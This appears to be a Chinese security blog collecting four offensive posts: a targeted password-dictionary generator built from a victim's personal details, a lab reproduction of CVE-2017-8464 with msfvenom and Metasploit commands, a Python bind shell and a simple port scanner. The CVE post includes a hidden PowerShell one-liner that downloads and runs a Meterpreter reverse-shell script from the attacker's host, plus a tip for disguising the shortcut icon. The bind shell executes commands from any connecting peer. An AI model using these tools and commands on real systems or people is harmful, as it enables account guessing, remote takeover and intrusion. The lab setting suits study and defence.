
社工密码生成

看了大量报告就知道一个短小精悍的字典有多重要。
本来想写根据键盘布局设置的密码字典的,类似

  • qwerty

  • qwer1234

  • q1w2e3r4

  • qazwsx

  • qwer!@#

  • asdf8888

  • ......
    从CSDN_TOP_5K来看,这种根据键盘布局设置的密码应该是最高频的一类密码,至少在程序猿界是这样的。

但是这种密码太灵活了,没写出来,只好写了个简单的。
只写了两种属性组合方式,生日+密码和配偶+关键词,以后再添加有用的组合。

#! /usr/bin/env python
# coding: utf-8
'''
社工字典生成
date: 2017/6/17
'''
import string

# Accumulated candidate passwords.  The *_combos functions below append to
# this module-level list; the __main__ block deduplicates it before saving.
pwdList = []

# 目标属性
# Attributes of the target person; every fragment list is derived from these.
class Person:
    """Static profile of the target: name, birthday, partner, pet phrases, separators."""

    NAME = "han tie gun"          # space-separated pinyin, surname first
    BIRTHDAY = "1926 08 17"       # "YYYY MM DD"
    PARTNER = 'wang gang dan'     # partner's name, same layout as NAME
    LOVE_KEYS = [
        '520',
        '1314',
        '5201314',
        '1314520',
        '2920184',
        'love',
    ]
    SYMBOL = [
        '!',
        '@',
        '#',
        '_',
        '-',
        ',',
        '.',
        '!@#',
        '$%^',
    ]

# 属性拓展
# Attribute expansion
def get_name(name):
    """Expand a space-separated (pinyin) full name into password fragments.

    Returned in this order: every word capitalised and joined; only the first
    letter capitalised; the first word (surname); the surname capitalised;
    the remaining words joined; the initials; the initials in upper case.
    """
    words = name.split()
    surname = ''.join(words[:1])
    given = ''.join(words[1:])
    # First character of each single-space-separated part.
    initials = ''.join(part[:1] for part in name.split(' '))
    return [
        string.capwords(name).replace(' ', ''),
        name.capitalize().replace(' ', ''),
        surname,
        surname.capitalize(),
        given,
        initials,
        initials.upper(),
    ]

def get_birthday(day):
    """Expand a "YYYY MM DD" string into: full date, year+month, month+day, year."""
    digits = day.replace(' ', '')
    return [digits, digits[:6], digits[4:], digits[:4]]

def get_partner(partner):
    """Expand the partner's name exactly like get_name()."""
    return get_name(partner)

def get_lovekeys(keys):
    """Return the pet-phrase list unchanged (no expansion is applied)."""
    return keys

def get_symbol(symbols):
    """Return the separator list unchanged (no expansion is applied)."""
    return symbols

# Expand each Person attribute into its fragment list (order is irrelevant;
# each call depends only on Person).
symbolList = get_symbol(Person.SYMBOL)
lovekeys = get_lovekeys(Person.LOVE_KEYS)
nameList = get_name(Person.NAME)
birthdayList = get_birthday(Person.BIRTHDAY)
partnerList = get_partner(Person.PARTNER)

# 属性组合
# 姓名+生日组合
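# Attribute combinations
# name + birthday
def name_birthday(nameList, birthdayList, symbolList):
    """Append name/birthday combinations to the module-level pwdList.

    Every name and birthday fragment is added on its own; then each
    (name, day) pair is added joined directly in both orders, and joined
    through each symbol in both orders.  Duplicates are not removed here;
    the caller deduplicates pwdList.

    Args:
        nameList: fragments from get_name().
        birthdayList: fragments from get_birthday().
        symbolList: separators placed between the two parts.
    """
    pwdList.extend(nameList)
    pwdList.extend(birthdayList)
    for name in nameList:
        for day in birthdayList:
            # Symbol-independent pairs belong outside the symbol loop;
            # appending them per symbol only produced duplicates.
            pwdList.append(name + day)
            pwdList.append(day + name)
            for symbol in symbolList:
                pwdList.append(name + symbol + day)
                # Was ``day + symbol + day``, which repeated the birthday
                # instead of mirroring ``name + symbol + day`` (compare
                # partner_lovekey, which does ``love + symbol + partner``).
                pwdList.append(day + symbol + name)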

# 配偶+lovekey组合
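# partner + lovekey
def partner_lovekey(partnerList, lovekeys, symbolList):
    """Append partner/pet-phrase combinations to the module-level pwdList.

    Each (partner, love) pair is added joined directly in both orders, and
    joined through each symbol in both orders.  Duplicates are not removed
    here; the caller deduplicates pwdList.

    Args:
        partnerList: fragments from get_partner().
        lovekeys: pet phrases from get_lovekeys().
        symbolList: separators placed between the two parts.
    """
    for partner in partnerList:
        for love in lovekeys:
            # Symbol-independent pairs once per (partner, love), not once
            # per symbol as before; the final set() result is unchanged.
            pwdList.append(partner + love)
            pwdList.append(love + partner)
            for symbol in symbolList:
                pwdList.append(partner + symbol + love)
                pwdList.append(love + symbol + partner)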

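def savefile(pwdList, filename="result.txt"):
    """Write one candidate per line to *filename* and report the count.

    Args:
        pwdList: strings to write, in the order given.
        filename: output path; defaults to ``result.txt`` in the current
            directory (the value that used to be hard-coded).
    """
    with open(filename, "w") as f:
        f.writelines(line + '\n' for line in pwdList)
    # print(...) with a single argument behaves the same on Python 2 and 3.
    print("\r\n[*] Generated %d lines" % len(pwdList))
    print("[*] The results saved as %s" % filename)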
if __name__ == '__main__':
    # Both generators append to the module-level pwdList.
    name_birthday(nameList, birthdayList, symbolList)
    partner_lovekey(partnerList, lovekeys, symbolList)
    # Deduplicate; going through set() makes the output order arbitrary.
    pwdList = list(set(pwdList))
    savefile(pwdList)

1.png

最近又刚发现某大佬写的利器,感觉应该很好用,基本上我想要的功能都有,伏地膜-。-

CVE-2017-8464 复现

CVE-2017-8464

简介

通过在快捷方式里注入恶意代码,加载远程的恶意powershell脚本,执行命令。

测试环境

  • KALI: 192.168.6.129

  • windows 2008: 192.168.6.132

过程

  • 生成反弹shell的ps脚本

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.6.129 lport=4444 -f psh-reflection > /var/www/html/evil.ps1
  • 启动web服务器

service apache2 start
  • 监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.6.129
exploit -jz
  • 制作恶意快捷方式
    1.png

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.6.129/evil.ps1');test.ps1"
  • 技巧
    换个有欺骗性的图标

2.png

  • 上线

3.png

修复

打对应补丁

ps.
其实是个比较鸡肋的洞,甚至都不算漏洞。可能用来钓鱼提权还行。

python版netcat

从《python黑帽子》上学来的,不过简化了它的功能,只保留了shell。其实就是个正向shell。

实现过程

程序分为两部分,client和server。
client的功能是:

  1. 连接服务端

  2. 发送命令

  3. 接收命令执行结果

对应的函数为client_sender()

server的功能是:

  1. 建立监听-->server_loop()

  2. 接收命令-->client_handler()

  3. 执行命令-->run_command()

  4. 发送执行结果-->client_handler()

2到4步形成一个循环。

代码

#! /usr/bin/env python
# coding: utf-8

import sys
import socket
import threading
import subprocess
import argparse

# Runtime configuration, filled in by main() from the command line.
listen = False  # True once -l/--listen was given
target = ""     # host to connect to (client) or to bind (server)
port = 0        # TCP port; 0 until -p/--port is parsed

def usage():
    """Parse the command line and return the argparse namespace.

    All three options default to "" so main() can test them with len().
    (``action="store"`` is argparse's default and is therefore omitted.)
    """
    parser = argparse.ArgumentParser(description="usage:")
    parser.add_argument("-t", "--target", default="", help="target host")
    parser.add_argument("-p", "--port", default="", help="the target port")
    parser.add_argument("-l", "--listen", default="", help="listen on [host]:[port]")
    return parser.parse_args()

# 客户端函数
# Client side
def client_sender(buffer):
    """Interactive client loop for the listener started by server_loop().

    Connects to the module globals ``target``/``port``, sends *buffer*
    (the stdin contents read by main()), then alternates between printing
    what the server returns and sending the next line typed by the user.
    Runs until an exception occurs; the bare ``except`` below also catches
    KeyboardInterrupt, so Ctrl-C only prints the exit message.
    """
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        client.connect((target, port))
        if len(buffer):
            client.send(buffer)
        # Receive the response
        while True:
            recv_len = 1
            response = ""
            while recv_len:
                data = client.recv(4096)
                recv_len = len(data)
                response += data
                # A chunk shorter than 4096 bytes is taken as the end of the
                # reply; a reply that fills a chunk exactly makes the loop
                # block on the next recv().
                if recv_len < 4096:
                    break
            print response,
            # Read the next command from the user
            buffer = raw_input("")
            buffer += "\n"
            client.send(buffer)
    except:
        print "\n[*]Exception! Exiting.\n"
    client.close()

# 服务器端
# Server side
def server_loop():
    """Accept connections forever and hand each one to client_handler().

    Reads the module globals ``target`` and ``port``.  When no target was
    given the socket binds to 0.0.0.0, i.e. every interface, and nothing
    authenticates the peer: whoever can reach the port gets the command
    loop in client_handler().  Never returns; the listening socket is not
    closed.
    """
    global target  # address to listen on
    if not len(target):
        target = "0.0.0.0"
    # Listen
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((target, port))
    server.listen(5)
    # Accept loop: one thread per client runs the receive/execute/reply cycle
    while True:
        clien_socket, addr = server.accept()
        print "[*]Connected to %s:%s\n" % (addr[0], addr[1])
        clien_thread = threading.Thread(target=client_handler, args=(clien_socket,))
        clien_thread.start()

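def run_command(command):  # server side
    """Run *command* through the system shell and return its combined output.

    ``shell=True`` hands the raw text received from the network to the
    shell: by design every connected peer gets arbitrary command execution
    on this host.  A non-zero exit status or a missing shell yields a fixed
    failure message instead of output.

    Args:
        command: command line as received; trailing whitespace/newline is
            stripped before execution.

    Returns:
        stdout+stderr of the command (str on Python 2, bytes on Python 3),
        or the failure message in the same type so it can be sent as-is.
    """
    command = command.rstrip()
    try:
        output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
    except (subprocess.CalledProcessError, OSError):
        # Narrowed from a bare ``except`` so KeyboardInterrupt/SystemExit
        # still propagate.  b"..." is str on Python 2 and bytes on 3,
        # matching what check_output() returns on the success path.
        output = b"Failed to execute command.\r\n"
    return output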

# 执行命令,返回执行结果
# Receive a command, run it, send back the result
def client_handler(client_socket):
    """Per-connection loop: send a prompt, read a line, execute it, reply.

    NOTE(review): run_command() and send() sit inside the inner ``while``,
    so every recv() chunk is executed as it arrives rather than once the
    line is complete.  When the peer disconnects recv() returns "" and the
    loop keeps re-running the partial buffer until a send() fails, which
    ends the thread with an unhandled exception.  Not changed here.
    """
    while True:
        client_socket.send("<shell:#>")
        cmd_buffer = ""
        while "\n" not in cmd_buffer:
            cmd_buffer += client_socket.recv(1024)
            response = run_command(cmd_buffer)
            client_socket.send(response)

def main():
    """Entry point: copy the parsed options into the module globals and dispatch.

    Server mode (-l given) runs server_loop().  Client mode (no -l, a target
    and a positive port) reads all of stdin and hands it to client_sender().
    The two modes are mutually exclusive, so the dispatch order is irrelevant.
    """
    global listen, port, target

    args = usage()
    if args.listen:
        listen = True
    if args.target:
        target = args.target
    if args.port:
        port = int(args.port)

    if listen:  # listen
        server_loop()
    elif target and port > 0:  # no listener: send data only
        # Input data
        buffer = sys.stdin.read()
        # Send data
        client_sender(buffer)
if __name__ == "__main__":
    # Script entry; main() parses argv and picks client or server mode.
    main()

ps: 只能在Linux下使用,客户端连接时以ctrl+d结束输入而非回车。

python端口扫描器

学习python网络编程,写了个tcp的端口扫描,单线程,仅仅为了学习而已。

#! /usr/bin/env python
# coding:utf-8
# 端口扫描
import argparse
import socket
import time

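def scan(ip, port, timeout=3):
    """Try a TCP connect to (ip, port) and return connect_ex()'s result.

    Args:
        ip: IPv4 address as a string.
        port: TCP port number.
        timeout: per-connection timeout in seconds (was hard-coded to 3).

    Returns:
        0 when the connection succeeded, otherwise the errno reported by
        connect_ex(); None if the socket could not be created or the
        arguments were rejected (the original returned None for any error).
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    except socket.error:
        return None
    try:
        # settimeout() applies to this socket.  The original called
        # socket.setdefaulttimeout() *after* creating it, which only affects
        # sockets created later, so the first probe had no timeout.
        s.settimeout(timeout)
        return s.connect_ex((ip, port))
    except (socket.error, ValueError, OverflowError):
        return None
    finally:
        s.close()  # the original never closed the socket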

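def scanport():
    """Probe target_ip from start_port to end_port (inclusive) and print open ports.

    Reads the module globals ``target_ip``, ``start_port`` and ``end_port``
    assigned in the ``__main__`` block; a port is reported when scan()
    returns 0.  Ports are probed one at a time, so the runtime grows with
    the size of the range (and with scan()'s timeout for filtered ports).
    """
    start_time = time.time()
    # print(...) with one argument behaves the same on Python 2 and 3.
    print(u"开放的端口: ")
    for port in range(start_port, end_port + 1):
        if scan(target_ip, port) == 0:
            print("* %d --- open" % port)
    print(u"扫描结束,耗时: %s s." % (time.time() - start_time))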
if __name__ == "__main__":
    # Positional arguments: host, first port, last port (all parsed as strings).
    parse = argparse.ArgumentParser()
    parse.add_argument("host", action="store", help="The target host")
    parse.add_argument("start", action="store", help="The start port")
    parse.add_argument("end", action="store", help="The end port")
    args = parse.parse_args()

    # Module globals read by scanport(); host names are resolved once here.
    target_ip = socket.gethostbyname(args.host)
    start_port = int(args.start)
    end_port = int(args.end)

    scanport()